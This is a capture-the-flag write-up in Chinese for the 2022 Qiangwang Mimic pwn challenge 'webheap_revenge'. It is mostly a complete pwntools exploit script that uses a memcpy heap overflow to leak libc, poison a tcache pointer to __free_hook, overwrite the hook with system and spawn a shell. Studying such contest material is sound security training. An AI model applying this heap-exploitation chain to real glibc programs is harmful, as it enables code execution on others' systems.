2022强网拟态pwn-webheap_revenge
这个和上个题差不多,uaf变成了堆溢出
这里的n会就是src里面的长度,没有限制大小,所以memcpy到dest中的时候就会发生堆溢出
通过堆溢打fd为hook,打hook为system即可
笔者用的2.31的libc,这题不能直接用one_gadget了,需要打成system
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './webheap_revenge'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 0
if debug:
r = remote()
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
def Serial(opt, index, size, content):
p1 = p8(0xb9) + p8(0x5) + p8(opt) + p8(index) + p8(0x82) + p32(size) + p8(0xbd) + p8(0x82) + p32(len(content)) + content + p8(0)
r.sendlineafter('Packet length: ', str(len(p1)))
r.sendafter('Content: ', p1)
def add(index, size):
Serial(0, index, size, b'')
def show(index):
Serial(1, index, 0, b'')
def delete(index):
Serial(2, index, 0, b'')
def edit(index, content):
Serial(3, index, 0, content)
add(0, 0x430)
add(1, 0x50)
delete(0)
add(2, 0x50)
show(2)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 1120 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
one = [0xe3afe, 0xe3b01, 0xe3b04]
one_gadget = one[1] + libc_base
system_addr = libc_base + libc.sym['system']
add(3, 0x50)
add(4, 0x50)
delete(4)
delete(3)
p1 = b'a' * 0x58 + p64(0x61) + p64(free_hook)
edit(2, p1)
add(5, 0x50)
add(6, 0x50)
edit(6, p64(system_addr))
edit(5, b'/bin/sh\x00')
delete(5)
r.interactive()